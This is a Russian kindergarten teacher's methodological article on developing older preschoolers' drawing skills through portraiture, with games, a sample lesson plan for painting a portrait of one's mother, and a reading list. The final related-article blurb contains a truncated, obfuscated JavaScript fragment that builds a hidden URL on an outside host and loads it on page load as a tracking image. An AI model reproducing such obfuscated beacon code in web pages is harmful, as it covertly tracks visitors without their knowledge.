РАЗВИТИЕ ИЗОБРАЗИТЕЛЬНЫХ УМЕНИЙ У СТАРШИХ ДОШКОЛЬНИКОВ НА ПРИМЕРЕ РИСОВАНИЯ ПОРТРЕТА
статья по рисованию на тему

Дунец Светлана Александровна

Формирование у детей понимания живописного и графического языка портрета. Развитие изобразительных навыков и умений.

Скачать:

ВложениеРазмер
Microsoft Office document icon dunets_statya_portret.doc53.5 КБ

Предварительный просмотр:

ГБДОУ «Радуга», Центральный район. Дунец С. А.

РАЗВИТИЕ ИЗОБРАЗИТЕЛЬНЫХ УМЕНИЙ У СТАРШИХ ДОШКОЛЬНИКОВ НА ПРИМЕРЕ РИСОВАНИЯ ПОРТРЕТА

Портрет это всегда двойной образ –

образ художника и образ модели

Э. Бурдель

Рисуя портрет другого человека, мы познаем себя. Наверно поэтому жанр портрета один из сложных и в то же время наиболее близкий и понятный детям, стремящимся к познанию себя через познание другого. С самого раннего возраста ребенок видит лицо своей мамы, лица окружающих его людей. Он эмоционально реагирует на проявления чувств со стороны взрослых.

Дети 5-6 лет уже обладают знаниями о человеке, его физическом облике, половых различиях, возрастных этапах развития. У них есть определенный опыт взаимоотношений со сверстниками и взрослыми. Им доступно понимание разных эмоциональных состояний, как положительных, так и отрицательных. Дети реагируют на изменение внешнего вида взрослого, друг друга, на одежду, прическу, настроение.

Дети 6-7 лет начинают видеть некоторые черты характера, такие как доброта, злость, хитрость, серьезность. Узнают, как проявляются эмоции, чувства через жесты, позу, мимику лица.

        Портрет - это тот жанр, благодаря которому ребенок может приобщиться к культуре и истории общества, приобрести знания об известных личностях, о профессиях, о быте и облике людей разного времени, их взаимоотношениях, чувствах и эмоциях.

        Постигая искусство портрета, ребенок начинает более внимательно и с интересом относиться к окружающим его людям, замечать их красоту, эмоциональное состояние. У него проявляется желание выразить свое отношение к ним через рисунок. Первыми появляются рисунки - портреты мамы, папы, братика и сестрички, - самых близких, тех, кого ребенок любит и видит каждый день.

С возрастом у ребенка растет желание изобразить маму более похожей, передать внешнее сходство, характерные черты, мимику лица, движение, жесты. И если рисунок не получается, постепенно пропадает интерес к рисованию. Ребенок начинает бояться рисовать.

Для успешного овладения детьми жанром портрета, необходимо знакомить их с произведениями портретного искусства и осуществлять изобразительную деятельность.

Постепенное формирование у детей понимания живописного и графического языка портрета происходит во время визуального восприятия по технологии “образ и мысль”, а так же в ходе диалоговых бесед. У дошкольников формируются навыки визуальной грамотности: рассматривание картин, выделение главного и осмысление отдельных деталей и фрагментов, умение “прочитывать” сюжет, определять эмоциональное состояние портретируемого.

Подобранные произведения должны быть высокохудожественными как по содержанию, так и по средствам выразительности.

Художественный образ портрета должен быть доступен пониманию детей, близок к уровню их эмоциональных переживаний.

Дети знакомятся с разнообразными типами портретов, средствами и манерой изображения. Просмотр произведений портретного искусства входит в предварительную работу перед началом продуктивной деятельности. У ребенка должно быть полное “погружение” в тему.

Поэтому темы детских работ связаны с временами года (“Портрет Осени”) и сезонными проявлениями природы (“Осень-непогодушка”), с социально-бытовым календарем (“Портрет Папы” ко Дню защитника Отечества, “Мама моя любимая” ко Дню матери, 8 Марта, “Портрет Петра I” ко Дню города), с решением задач воспитания культуры здоровья и здорового образа жизни у дошкольников (“Я с папой на прогулке”, “Мама, папа, я - спортивная семья”). Не остаются без внимания и интересы детей, их пожелания и инициативы.

В процессе ознакомления с портретом и продуктивной деятельности у детей развивается умение выделять главное, используя средства выразительности: рисунок, композицию, колорит. Цвет используется как средство передачи настроения, состояния, отношения к изображаемому или выделения главного.

 Развивается умение выбирать фон бумаги и сочетания красок. Так в процессе рисования сказочных образов Осени, Зимы, Весны дети знакомятся с колоритом - цветовым созвучием, направленным на передачу эмоционального состояния, красоты окружающего мира. (Радостная Осень, Нежная Весна, Суровая Зима). Освоению этого средства выразительности помогают художественно-развивающие игры и упражнения:

        “Найди спектральную гамму к настроению портрета”

        “Найди портрет по музыкальному сопровождению, художественному слову”

        “Найди портрет по палитре”

        “Преврати радостную Осень в грустную”

        “Кто больше назовет слов, передающих настроение портрета”

        “Волшебные цвета” (упражнение в составлении цветовых сочетаний).

Создание образов времен года происходит без предварительного рисунка карандашом, сразу красками - гуашью или восковыми мелками и акварелью.

Рисунок - важнейшее средство выразительности в портрете, способствующее передаче характерных индивидуальных черт (лицо, глаза, руки, поза, одежда, фон). Дошкольники овладевают им, работая над портретами:

        “Мама в красивом платье”

        “Портрет папы”

        “Автопортрет”

        “Мой самый лучший друг”

Ребенок знакомится с графическим портретом. Осваивает технику рисунка пером и тушью, карандашами, фломастерами, сангиной, пастелью.

Игра “Найди портрет по схеме” упражняет детей в определении эмоционального состояния человека, выраженного в мимике.

Игра “Найди недостаток в портрете” помогает закрепить знание о составных частях лица.

Игра “Семейный портрет” закрепляет знания детей о половых и возрастных особенностях людей.

Композиция - умение выбирать формат бумаги в соответствии с замыслом, располагать изображение на плоскости, выделять главное, передавать отношения между объектами. Дошкольники овладевают этими навыками в процессе рисования на темы:

“Я с мамой иду в детский сад”

“Я с папой на прогулке”

“Я и мой друг”

рисования иллюстраций к произведениям художественной литературы:

“Доктор Айболит лечит маленьких зверей”

“Снежная королева и ее царство”

“Снегурочка идет по лесу”

“Дюймовочка и ее друзья”

        Прежде чем приступить к работе над композицией, с детьми проводятся художественно-развивающие игры, направленные на развитие наблюдательности, памяти, коммуникативных способностей, воображения:

        “О чем говорит жест”

        “О чем говорит поза человека”

        “Разложи иллюстрации в последовательности развития сюжета”

        “Составь портрет сказочного героя”.

Упражняемся в рисунке карандашом. Рисуя человека, передаем позу, жест. Дети подготовительной группы рисуют эскиз картины.

        В работе над композицией детям предоставляется возможность самостоятельно выбирать материал и технику.

        В процессе работы над портретом у детей развивается умение создавать новые цветовые тона и оттенки. Дети осваивают работу разнообразными изобразительными материалами и инструментами, живописные и графические техники: способы работы с акварелью и гуашью, способы наложения цветового пятна, техники пера, тушевки, штриховки, технику пластилиновой живописи. Дошкольники осваивают способы рисования кистью: всем ворсом, концом кисти, примакиванием.

        Рассмотрим алгоритм работы по развитию изобразительных умений у старших дошкольников на примере рисования по представлению портрета “Мама моя любимая”.

Программное содержание:

  • Продолжить рисовать портрет человека, стараясь передать особенности внешнего вида, характер, настроение.
  • Вызвать интерес к поиску изобразительно-выразительных средств, позволяющих раскрыть образ более полно, точно, индивидуально.
  • Развивать изобразительные умения и навыки, творческие способности у старших дошкольников.
  • Продолжить знакомство с жанром портрета.

Предварительная работа:

Рассматривание репродукций картин известных художников: З. Серебрякова “За туалетом”, В. Боровиковский “Портрет М.И. Лопухиной”, И. Артунов “Портрет крестьянки в русском костюме”.

Экспериментирование с цветом гуашевых красок для получения телесного цвета.

Рассматривание семейных фотографий, разучивание песен, декламация и чтение стихов о маме.

Материалы: бумага, гуашь, кисти, репродукции картин известных художников портретистов.

Организация продуктивной деятельности.

Рассматривание репродукций картин с женским портретом. Провожу беседу о том, как называются эти картины (портреты). Кто на них изображен? (Женщина, девушка…) Как художник изобразил свою модель? Что важно для художника портретиста? (Передать сходство, характер, настроение модели). Что помогает художнику передать настроение? (Цвет) Какой фон выбрал художник? (Изображение природы, интерьера, стены). Предлагаю детям рассказать о своей маме с помощью кисти и красок, передать ее внешние черты, настроение, характер и свое отношение к ней.

Показ последовательности рисования.

Как получить телесный цвет? - Смешиваем краски (охра+белый или желтый+красный+белый) в зависимости от пропорций получаем разные оттенки телесного цвета.

  • Рисуем овал лица
  • Рисуем одежду (платье, свитер, куртку...)
  • Когда лицо высохло, рисуем белой краской почти по середине овала глаза (примакивание кистью)
  • Подбираем цвет волос (2-3 оттенка, показ цветовых сочетаний) рисуем прическу.
  • Продолжаем рисовать глаза (радужную оболочку, зрачок, ресницы)
  • Рисуем брови и нос.
  • Рисуем рот (улыбку)
  • Рисуем фон (окно, стена, деревья, небо…).

Рассматриваем получившиеся портреты. Обращаем внимание на сходство, “похожесть” мам на портретах. Насколько красиво композиционно заполнен лист изображением? Какими средствами удалось передать настроение, характер мамы.

Оформляется выставка детских работ.

Предложенный подход к организации занятия по рисованию портрета способствует развитию изобразительных умений у старших дошкольников за счет тематики, синтеза искусств, интеграции приемов, способствующих развитию художественного восприятия и изобразительности.

Литература

  1. Курочкина Н. А. О портретной живописи – детям. СПб., 2008.
  2. Лыкова И. А. Изобразительная деятельность в детском саду. М., 2009.
  3. Старк Н. В. Портреты и лица. М 1995.
  4. Дроздова В. Зинаида Серебрякова. М 2001.
  5. Куликов В. Н., Ковалев А. Г. Эмоции и чувства в жизни человека. Иваново, 1997.
  6. Любин И. Мимика, жесты, поза. СПб., 1993.


По теме: методические разработки, презентации и конспекты

"Развитие коммуникативных умений у старших дошкольников с ОНР в ДОУ"

Цель:-теоретически изучить  проблему развития коммуникационных умений  у старших дошкольников с ОНР в ДОУ и выявить нетрадиционные методы и приемы  работы с детьми по решению данной про...

Создание психолого-педагогических условий для развития проектной деятельности у старших дошкольников на примере педагогического проекта «Сказка — как источник творчества детей.

В соответствии с ФГОС ДО в дошкольном возрасте у детей должен появиться опыт создания собственного замысла и воплощения своих проектов. В дошкольном возрасте дети могут задумывать и реализовывать иссл...

Консультация для воспитателей ДОУ «Развитие изобразительного творчества у старших дошкольников, используя нетрадиционные техники рисования».

В консультации рассматриваются вопросы психологии детского творчества. Даются рекомендации по нетрадиционным техникам рисования....

Развитие коммуникативных умений у старших дошкольников в совместной ИЗО-деятельности

Эфффективность влияния коллективной изобразительной  деятельности на развитие коммуникативных умений у старших дошкольников...

Развитие изобразительных умений у старших дошкольников на примере рисования портрета

Формирование у детей понимания живописного и графического языка портрета. Развитие изобразительных навыков и умений....

"Теоретические основы развития изобразительных умений детей старшего дошкольного возраста в сюжетном рисовании"

\'use strict\';var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'fhka.trkg.ru\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!wi...